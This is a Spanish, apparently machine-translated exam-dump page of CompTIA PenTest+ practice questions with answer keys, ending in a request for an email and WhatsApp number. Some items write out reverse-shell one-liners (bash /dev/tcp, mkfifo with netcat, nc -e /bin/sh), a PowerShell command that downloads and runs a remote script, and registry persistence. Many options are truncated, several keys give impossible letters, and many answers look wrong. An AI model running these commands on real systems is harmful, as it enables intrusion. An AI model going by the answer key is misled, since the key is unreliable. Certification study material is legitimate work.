¿NO QUIERES PERDERTE NADA?

Consejos para aprobar el examen de certificación

Últimas noticias sobre exámenes e información sobre descuentos.

Curado y actualizado por nuestros expertos.

Sí, envíame el boletín.

CompTIA PT0-001 Preguntas y Respuestas del Examen de Certificación, Certificación CompTIA PenTest+ | SPOTO

Prepárese para el examen de certificación CompTIA PenTest+ (PT0-001) con nuestros completos recursos. Nuestras pruebas de práctica, con las últimas preguntas del examen, están diseñados para ayudarle a sobresalir en su viaje de preparación. La certificación PT0-001 es única en su enfoque en la habilidad práctica, probando a los candidatos en diversos entornos, incluyendo la nube y plataformas móviles, junto con escritorios y servidores tradicionales. Practicando con nuestras preguntas de examen, preguntas de muestra y volcados de examen, obtendrá una comprensión profunda del contenido del examen y estará bien preparado para afrontar los retos. Nuestros exámenes de prueba y el simulador de examen mejoran aún más su preparación, garantizando que esté equipado para tener éxito el día del examen. Aproveche nuestros materiales y respuestas de examen para aumentar su confianza y lograr sus objetivos de certificación de CompTIA PenTest+.
Realizar otros exámenes en línea

Cuestionar #1
Un probador de penetración ejecuta los siguientes comandos: ¿Cuál de las siguientes es una vulnerabilidad de host local que el atacante está explotando?
A. Permisos de archivo inseguros
B. Lista blanca de aplicaciones
C. Escape de la concha
D. Servicio grabable
Ver respuesta
Respuesta correcta: D
Cuestionar #2
Un evaluador de intrusiones está redactando un informe que describe el nivel general de riesgo para las operaciones. En cuál de las siguientes áreas del informe debería ponerlo?
A. Apéndices
B. Resumen ejecutivo
C. Resumen técnico
D. Cuerpo principal
Ver respuesta
Respuesta correcta: B
Cuestionar #3
Dado el siguiente script de Python: ¿Cuál de los siguientes es el destino de la salida?
A. A la pantalla
B. A un servidor de red
C. A un archivo
D. A /dev/null
Ver respuesta
Respuesta correcta: A
Cuestionar #4
Un probador de penetración está revisando la siguiente salida de un sniffer inalámbrico: ¿Cuál de las siguientes opciones puede extrapolarse de la información anterior?
A. Proveedor de hardware
B. Interferencias de canal
C. Nombres de usuario
D. Fortaleza clave
Ver respuesta
Respuesta correcta: ACG
Cuestionar #5
Un probador de penetración quiere lanzar una ventana de consola gráfica desde un host comprometido remotamente con IP 10.0.0.20 y mostrar el terminal en el ordenador local con IP 192.168.1.10. ¿Cuál de las siguientes opciones realizaría esta tarea?
A. Desde el ordenador remoto, ejecute los siguientes comandos: export XHOST 192
B. Desde el ordenador local, ejecute el siguiente comando: ssh -L4444:127
C. Desde el ordenador remoto, ejecute el siguiente comando: ssh -R6000:127
D. Desde el ordenador local, ejecute el siguiente comando: nc -l -p 6000 A continuación, desde el ordenador remoto, ejecute el siguiente comando: xterm | nc 192
Ver respuesta
Respuesta correcta: D
Cuestionar #6
Un consultor de seguridad recibe un documento en el que se describe el alcance de una próxima prueba de penetración. Este documento contiene direcciones IP y las horas en que cada una puede ser escaneada. ¿Cuál de los siguientes documentos contendría esta información?
A. Reglas de enfrentamiento
B. Solicitud de propuestas
C. Contrato marco de servicios
D. Análisis del impacto empresarial
Ver respuesta
Respuesta correcta: A
Cuestionar #7
Un cliente ha solicitado una prueba de penetración de red externa con fines de cumplimiento. Durante la discusión entre el cliente y el probador de penetración, el cliente expresa su renuencia a agregar las direcciones IP de origen del probador de penetración a la lista blanca de IPS del cliente durante la duración de la prueba. ¿Cuál de los siguientes es el MEJOR argumento para justificar la inclusión de las direcciones IP de origen del evaluador en la lista blanca?
A. Las listas blancas evitan un posible ataque DoS inadvertido contra el IPS y los sistemas de monitorización de registros de apoyo
B. Las pruebas de penetración de sistemas IPS de terceros suelen requerir documentación y autorizaciones adicionales, lo que puede retrasar la realización de pruebas urgentes
C. Las reglas de listas blancas de IPS requieren actualizaciones frecuentes para mantenerse al día, en constante desarrollo de vulnerabilidades y debilidades recién descubiertas
D. Las pruebas deben centrarse en el descubrimiento de posibles problemas de seguridad en todos los sistemas incluidos, no en determinar la eficacia relativa de las defensas activas, como un IPS
Ver respuesta
Respuesta correcta: A
Cuestionar #8
¿De cuál de los siguientes tipos de técnicas de intrusión es un ejemplo el uso de una "herramienta bajo la puerta" durante una evaluación de seguridad física?
A. Ganzúas
B. Activación del sensor de salida
C. Lock bumping
D. Bloqueo de derivación
Ver respuesta
Respuesta correcta: A
Cuestionar #9
Un probador de penetración está realizando ARP spoofing contra un switch. Cuál de las siguientes opciones debería falsificar para obtener la MAYOR cantidad de información?
A. Dirección MAC del cliente
B. Dirección MAC del controlador de dominio
C. Dirección MAC del servidor web
D. Direccion MAC de la puerta de enlace
Ver respuesta
Respuesta correcta: A
Cuestionar #10
¿Cuál de los siguientes comandos inicia la base de datos de Metasploit?
A. msfconsole
B. espacio de trabajo
C. msfvenom
D. db_init
E. db_connect
Ver respuesta
Respuesta correcta: AB
Cuestionar #11
¿Cuál de las siguientes herramientas se utiliza para realizar un ataque de fuerza bruta de credenciales?
A. Hydra
B. Juan el Destripador
C. Hashcat
D. Melocotón
Ver respuesta
Respuesta correcta: D
Cuestionar #12
Una organización sanitaria debe cumplir la normativa local para proteger y certificar la protección de la información sanitaria personal de las personas cubiertas. ¿Cuál de las siguientes condiciones debe comprobar específicamente un probador de penetración al realizar una evaluación? (Seleccione DOS).
A. Exposición en texto claro de datos trap SNMP
B. Errores de software residentes en el sistema de tickets de TI
C. Plantillas de certificados S/MIME definidas por la CA
D. Información sanitaria comunicada a través de HTTP
E. Cifrado DAR en servidores de registros
Ver respuesta
Respuesta correcta: A
Cuestionar #13
Durante una evaluación de una aplicación web, un evaluador de penetración descubre que se pueden ejecutar comandos arbitrarios en el servidor. Queriendo llevar este ataque un paso más allá, el probador de penetración comienza a explorar formas de obtener un shell inverso de vuelta a la máquina atacante en 192.168.1.5. ¿Cuáles de las siguientes son posibles formas de hacerlo? (Seleccione DOS).
A. nc 192
B. nc -nlvp 44444 -e /bin/sh
C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
D. nc -e /bin/sh 192
E. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
F. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
Ver respuesta
Respuesta correcta: A
Cuestionar #14
Al intentar mantener la persistencia en un sistema Windows con privilegios limitados, ¿cuál de las siguientes claves de registro debe utilizar el probador?
A. HKEY_CLASSES_ROOT
B. HKEY_LOCAL_MACHINE
C. HKEY_ACTUAL_USER
D. HKEY_CURRENT_CONFIG
Ver respuesta
Respuesta correcta: D
Cuestionar #15
Un especialista en pruebas de penetración ha realizado una evaluación de seguridad para una empresa emergente. El informe enumera un total de diez vulnerabilidades, cinco de ellas identificadas como críticas. El cliente no tiene los recursos para remediar inmediatamente todas las vulnerabilidades. En estas circunstancias, ¿cuál de las siguientes sería la MEJOR sugerencia para el cliente?
A. Aplique controles compensatorios sencillos para las vulnerabilidades críticas con el fin de minimizar el riesgo y, a continuación, vuelva a priorizar la corrección
B. Identifique los problemas que pueden solucionarse más rápidamente y resuélvalos en primer lugar
C. Aplicar primero las medidas correctoras de las vulnerabilidades críticas con menor impacto y, a continuación, abordar las demás vulnerabilidades críticas
D. Arreglar la vulnerabilidad mas critica primero, aun si eso significa que arreglar las otras vulnerabilidades puede tomar mucho tiempo
Ver respuesta
Respuesta correcta: B
Cuestionar #16
Un probador de penetración quiere atacar el servicio de nombres NETBIOS. ¿Cuál de los siguientes es el comando MÁS probable para explotar el servicio de nombres NETBIOS?
A. arpspoof
B. nmap
C. responder
D. burpsuite
Ver respuesta
Respuesta correcta: A
Cuestionar #17
Un evaluador de penetración informa que una aplicación sólo utiliza autenticación básica en una aplicación orientada a Internet. ¿Cuál de las siguientes sería la MEJOR estrategia de corrección?
A. Active la seguridad estricta de transporte HTTP
B. Habilitar una bandera de cookie segurA
C. Cifrar el canal de comunicación
D. Sanitize la entrada invalida del usuario
Ver respuesta
Respuesta correcta: C
Cuestionar #18
Después de obtener acceso inicial de bajo privilegio a un sistema Linux, un probador de penetración identifica un binario interesante en la carpeta de inicio de un usuario titulado ''changepass." -sr-xr-x 1 root root 6443 Oct 18 2017 /home/user/changepass Utilizando "strings" para imprimir caracteres imprimibles ASCII de changepass, el probador observa lo siguiente: $ strings changepass exit setuid strcmp GLIBC_2.0 ENV_PATH %s/changepw malloc strlen Dada esta información, ¿cuál de las siguientes es la ruta de explotación MÁS probable para conseguir root p
A. Copia changepass a un directorio con permisos de escritura y exporta la variable de entorno ENV_PATH a la ruta de un binario de robo de tokens llamado changepw
B. Crea una copia de changepass en el mismo directorio, llamándola changepw
C. Exporte la variable de entorno ENV_PATH a la ruta de un directorio con permisos de escritura que contenga un binario de robo de tokens llamado changepw
D. Ejecute changepass dentro del directorio actual con sudo después de exportar la variable de entorno ENV_PATH a la ruta de '/usr/local/bin'
Ver respuesta
Respuesta correcta: A
Cuestionar #19
¿Cuál de las siguientes propiedades del acuerdo de compromiso de pruebas de penetración tendrá el MAYOR impacto en la observación y prueba de sistemas de producción en sus cargas más altas?
A. Creación de un ámbito de los sistemas de producción críticos
B. Establecer un calendario de horarios de acceso a las pruebas
C. Establecer un compromiso de pruebas de caja blanca
D. Hacer que la dirección autorice las pruebas intrusivas
Ver respuesta
Respuesta correcta: C
Cuestionar #20
¿En cuál de los siguientes escenarios realizaría un probador un ataque Kerberoasting?
A. El probador ha comprometido un dispositivo Windows y vuelca los secretos LSA
B. El probador necesita recuperar la base de datos SAM y descifrar los hashes de las contraseñas
C. El probador ha comprometido a un usuario con privilegios limitados y necesita apuntar a otras cuentas para el movimiento lateral
D. El probador ha comprometido una cuenta y necesita volcar hashes y contraseñas en texto plano del sistemA
Ver respuesta
Respuesta correcta: B
Cuestionar #21
Durante las pruebas, se descubre una vulnerabilidad crítica en el servidor central de un cliente. ¿Cuál de las siguientes debería ser la PRÓXIMA acción?
A. Desactivar el puerto de red del servicio afectado
B. Completar todas las conclusiones y presentarlas al cliente
C. Avisar inmediatamente al cliente con los detalles del hallazgo
D. Desconectar el objetivo para que no pueda ser explotado por un atacante
Ver respuesta
Respuesta correcta: D
Cuestionar #22
Un evaluador de seguridad está intentando crear archivos XML especializados para probar la seguridad de las funciones de análisis sintáctico durante la ingesta en una aplicación de Windows. Antes de empezar a probar la aplicación, ¿cuál de los siguientes elementos debe solicitar el evaluador a la organización?
A. Ejemplos de mensajes SOAP
B. La documentación de la API REST
C. Una utilidad de comprobación de protocolos
D. Un archivo XSD aplicable
Ver respuesta
Respuesta correcta: A
Cuestionar #23
¿Cuál de los siguientes extractos procedería de una política de empresa?
A. Las contraseñas de los empleados deben contener un mínimo de ocho caracteres, siendo uno de ellos alfanumérico
B. Puede llamar al servicio de asistencia al 800-passwd1 para restablecer las contraseñas
C. Los empleados deben utilizar contraseñas seguras para acceder a los activos de la empresA
D. Los sistemas corporativos deben almacenar contraseñas usando el algoritmo hashing MD5
Ver respuesta
Respuesta correcta: B
Cuestionar #24
Se encontró la siguiente línea en el archivo de historial de una máquina explotada. Un atacante ejecutó el siguiente comando: bash -i >& /dev/tcp/192.168.0.1/80 0> &1 ¿Cuál de las siguientes opciones describe lo que hace el comando?
A. Realiza un escaneo de puertos
B. Agarra el banner del servidor web
C. Redirige un TTY a un sistema remoto
D. Elimina los registros de errores para la IP suministradA
Ver respuesta
Respuesta correcta: AC
Cuestionar #25
Un infiltrado fue capaz de recuperar las credenciales iniciales del dominio de usuario de la VPN suplantando la identidad de un miembro del departamento de TI. Después, el probador de penetración obtuvo hashes a través de la VPN y los descifró fácilmente utilizando un ataque de diccionario. ¿Cuál de los siguientes pasos debería recomendarse? (Seleccione TRES).
A. Obligar a todos los empleados a recibir formación sobre seguridad
B. Implantar la autenticación de dos factores para el acceso remoto
C. Instale un sistema de prevención de intrusiones
D. Aumentar los requisitos de complejidad de las contraseñas
E. Instalar una solución de monitorización de eventos de información de seguridad
F. Impedir que los miembros del departamento de TI inicien sesión interactivamente como administradores
G. Actualizar el conjunto de cifrado utilizado para la solución VPN
Ver respuesta
Respuesta correcta: A
Cuestionar #26
Un probador de penetración ha desplegado con éxito un gemelo malvado y está empezando a ver algo de tráfico de la víctima. El siguiente paso que quiere dar es capturar todo el tráfico web de la víctima sin cifrar. ¿Cuál de las siguientes opciones sería la MEJOR para alcanzar este objetivo?
A. Realizar un ataque de downgrade HTTP
B. Recoger las credenciales de usuario para descifrar el tráfico
C. Realizar un ataque MITM
D. Implementar un ataque CA suplantando CAs de confianzA
Ver respuesta
Respuesta correcta: A
Cuestionar #27
Considere el siguiente comando PowerShell: powershell.exe IEX (New-Object Net.Webclient).downloadstring(http://site/script.ps1");Invoke-Cmdlet ¿Cuál de los siguientes describe MEJOR las acciones realizadas por este comando?
A. Establezca la política de ejecución
B. Ejecutar un script remoto
C. Ejecutar un comando codificado
D. Instanciar un objeto
Ver respuesta
Respuesta correcta: C
Cuestionar #28
Una empresa de energía contrató a una empresa de seguridad para realizar una prueba de penetración en una central eléctrica, que emplea ICS para gestionar la generación de energía y la refrigeración. Cuál de las siguientes es una consideración exclusiva de dicho entorno que la empresa debe tener en cuenta al preparar la evaluación?
A. Selección del conjunto adecuado de herramientas de pruebas de seguridad
B. Intensidad y capacidad de carga de los componentes del ICS
C. Peligros potenciales para el funcionamiento y la seguridad
D. Certificación eléctrica del hardware utilizado en la prueba
Ver respuesta
Respuesta correcta: DE
Cuestionar #29
Un probador de penetración observa que varios puertos con números altos están escuchando en un servidor web público. Sin embargo, el propietario del sistema dice que la aplicación sólo utiliza el puerto 443. ¿Cuál de las siguientes sería la MEJOR recomendación?
A. Transición de la aplicación a otro puerto
B. Filtrar el puerto 443 a direcciones IP específicas
C. Implantar un cortafuegos de aplicaciones web
D. Desactivar servicios innecesarios
Ver respuesta
Respuesta correcta: D
Cuestionar #30
Un probador de penetración está realizando un escaneo remoto para determinar si la granja de servidores cumple con la línea base de software de la compañía. Cuál de las siguientes acciones debe realizar el evaluador de intrusiones para verificar el cumplimiento de la línea de base?
A. Exploración del descubrimiento
B. Escaneo sigiloso
C. Escaneo completo
D. Exploración acreditada
Ver respuesta
Respuesta correcta: B
Cuestionar #31
Un probador de penetración está probando una aplicación bancaria y descubre una vulnerabilidad. El probador está conectado como un usuario sin privilegios que no debería tener acceso a ningún dato. Dados los siguientes datos del proxy de interceptación web: ¿Cuál de los siguientes tipos de vulnerabilidades está siendo explotada?
A. Vulnerabilidad de navegación forzada
B. Vulnerabilidad a la contaminación de los parámetros
C. Vulnerabilidad en la carga de archivos
D. Enumeración de cookies
Ver respuesta
Respuesta correcta: A
Cuestionar #32
Durante una evaluación de seguridad completa, ¿cuál de los siguientes es un requisito previo para aplicar ingeniería social a un objetivo mediante el contacto físico con él?
A. Localización de las salidas de emergencia
B. Preparar un pretexto
C. Hacerle la ola a la víctima
D. Seguir a la víctima
Ver respuesta
Respuesta correcta: A
Cuestionar #33
Se proporcionó a un analista de seguridad un informe de penetración detallado, que se realizó contra el entorno DMZ de la organización. Se observó en el informe que un hallazgo tiene una puntuación base CVSS de 10,0. ¿Cuál de los siguientes niveles de dificultad se requeriría para explotar esta vulnerabilidad? ¿Cuál de los siguientes niveles de dificultad sería necesario para explotar esta vulnerabilidad?
A. Muy difícil; los sistemas perimetrales suelen estar detrás de un cortafuegos
B. Algo difícil; requeriría una potencia de procesamiento significativa para explotarlo
C. Trivial; se requiere poco esfuerzo para explotar este hallazgo
D. Imposible; los hosts externos están reforzados para protegerlos contra ataques
Ver respuesta
Respuesta correcta: C
Cuestionar #34
Un usuario malintencionado quiere realizar un ataque MITM a un ordenador. La configuración de red del ordenador es la siguiente IP: 192.168.1.20 NETMASK: 255.255.255.0 DEFAULT GATEWAY: 192.168.1.254 DHCP: 192.168.1.253 DNS: 192.168.10.10, 192.168.20.10 ¿Cuál de los siguientes comandos debería ejecutar el usuario malicioso para realizar el ataque MITM?
A. arpspoof -c ambos -r -t 192
B. arpspoof -t 192
C. arpspoof -c both -t 192
D. arpspoof -r -t 192
Ver respuesta
Respuesta correcta: D
Cuestionar #35
Un probador de penetración ha obtenido acceso al dispositivo de un empleado de marketing. El probador de penetración quiere asegurarse de que si se descubre el acceso, se puede recuperar el control del dispositivo. ¿Cuál de las siguientes acciones debe utilizar el probador de penetración para mantener la persistencia al dispositivo? (Seleccione DOS.)
A. Coloque una entrada en HKLM\Software\Microsoft\CurrentVersion\Run para llamar a au57d
B. Coloque una entrada en C:\windows\system32\drivers\etc\hosts para 12
C. Coloque un script en C:\users\%username\local\appdata\roaming\temp\au57d
D. Crear un servicio falso en Windows llamado RTAudio para ejecutarlo manualmente
E. Coloque una entrada para RTAudio en HKLM\CurrentControlSet\Services\RTAudio
F. Cree una tarea programada para llamar a C:\windows\system32\drivers\etc\hosts
Ver respuesta
Respuesta correcta: AC
Cuestionar #36
Un probador de penetración fue capaz de introducir un comando de inyección SQL en un cuadro de texto y obtener acceso a la información almacenada en la base de datos. ¿Cuál de las siguientes es la MEJOR recomendación para mitigar la vulnerabilidad?
A. Aleatorizar las credenciales utilizadas para iniciar sesión
B. Instalar detección de intrusos basada en host
C. Aplicar la normalización de la entradA
D. Realizar el endurecimiento del sistemA
Ver respuesta
Respuesta correcta: AE
Cuestionar #37
¿Cuál de las siguientes herramientas utilizaría un probador de penetración para llevar a cabo OSINT? (Seleccione DOS).
A. Shodan
B. SET
C. BeEF
D. Wireshark
E. Maltego
F. Dinamo
Ver respuesta
Respuesta correcta: CD
Cuestionar #38
¿Cuál de las siguientes es la razón por la que una persona que realiza pruebas de penetración ejecutaría el comandochkconfig --del servicename al final de una intervención?
A. Para eliminar la persistencia
B. Para activar la persistencia
C. Informar de la persistencia
D. Para comprobar la persistencia
Ver respuesta
Respuesta correcta: A
Cuestionar #39
¿Cuál de las siguientes situaciones haría que un evaluador de penetración se comunicara con el propietario/cliente de un sistema durante el transcurso de una prueba? (Seleccione DOS.)
A. El probador descubre datos de identificación personal en el sistemA
B. El sistema muestra evidencias de un compromiso previo no autorizado
C. El sistema muestra una falta de endurecimiento en toda su extensión
D. El sistema no esta disponible despues de un intento de exploit
E. El probador descubre un hallazgo en un sistema fuera del alcance
Ver respuesta
Respuesta correcta: A
Cuestionar #40
Un probador de penetración quiere crear un script para descubrir todos los registros RPTR para un rango de direcciones IP. Cuál de las siguientes opciones es la MÁS eficiente?
A. nmap -p 53 -oG dnslist
B. nslookup -ns 8
C. for x in {1
D. dig -r > echo "8
Ver respuesta
Respuesta correcta: D
Cuestionar #41
Durante una prueba de penetración de una aplicación web, un evaluador de penetración observa que falta el encabezado de la política de seguridad de contenidos. Cuál de las siguientes técnicas realizaría con MAYOR probabilidad?
A. Ataque de inyección de comandos
B. Ataque clickjacking
C. Ataque a través de directorios
D. Ataque remoto de inclusion de archivos
Ver respuesta
Respuesta correcta: D
Cuestionar #42
Un evaluador de penetración revisa los resultados del análisis de una aplicación web. ¿Cuál de las siguientes vulnerabilidades es la MÁS crítica y debería priorizarse para su explotación?
A. XSS almacenado
B. Divulgación de la trayectoria de llenado
C. Certificado caducado
D. Clickjacking
Ver respuesta
Respuesta correcta: D
Cuestionar #43
Un probador de penetración compromete un sistema que tiene acceso de red sin restricciones a través del puerto 443 a cualquier host. El investigador quiere crear un shell inverso desde la víctima hasta el atacante. ¿Cuál de los siguientes métodos utilizaría con MAYOR probabilidad?
A. perl -e 'use SOCKET'; $i='; $p='443;
B. ssh superadmin@-p 443
C. nc -e /bin/sh443
D. bash -i >& /dev/tcp//443 0>&1
Ver respuesta
Respuesta correcta: D
Cuestionar #44
¿Cuál de las siguientes es la razón por la que una persona que realiza pruebas de penetración ejecutaría el comando chkconfig --del servicename al final de una intervención?
A. Para eliminar la persistencia
B. Para activar la persistencia
C. Informar de la persistencia
D. Para comprobar la persistencia
Ver respuesta
Respuesta correcta: A
Cuestionar #45
¿Cuál de las siguientes opciones es la que MEJOR describe algunos puntos débiles significativos en la seguridad de un ICS, como los que se utilizan en instalaciones de suministro eléctrico, instalaciones de gas natural, presas e instalaciones nucleares?
A. Los proveedores de ICS tardan en implantar controles de seguridad adecuados
B. El personal del ICS no está adecuadamente formado para realizar las tareas básicas
C. Hay escasez de equipos de sustitución para dispositivos críticos
D. Hay una falta de cumplimiento para las instalaciones ICS
Ver respuesta
Respuesta correcta: B
Cuestionar #46
Los dispositivos IoT de consumo suelen ser menos seguros que los sistemas creados para ordenadores de sobremesa tradicionales. Cuál de las siguientes opciones describe MEJOR el razonamiento?
A. Los fabricantes que desarrollan dispositivos IoT se preocupan menos por la seguridad
B. Es difícil para los administradores aplicar las mismas normas de seguridad en todos los ámbitos
C. Los sistemas IoT suelen carecer de la potencia de hardware que requieren las soluciones más seguras
D. Las autoridades reguladoras suelen tener menores requisitos de seguridad para los sistemas IoT
Ver respuesta
Respuesta correcta: A

Ver respuestas después del envío

Envíe su correo electrónico y WhatsApp para obtener las respuestas a sus preguntas.

Nota: asegúrese de que su ID de correo electrónico y Whatsapp sean válidos para que pueda obtener los resultados correctos del examen.

Correo electrónico:
WhatsApp/número de teléfono: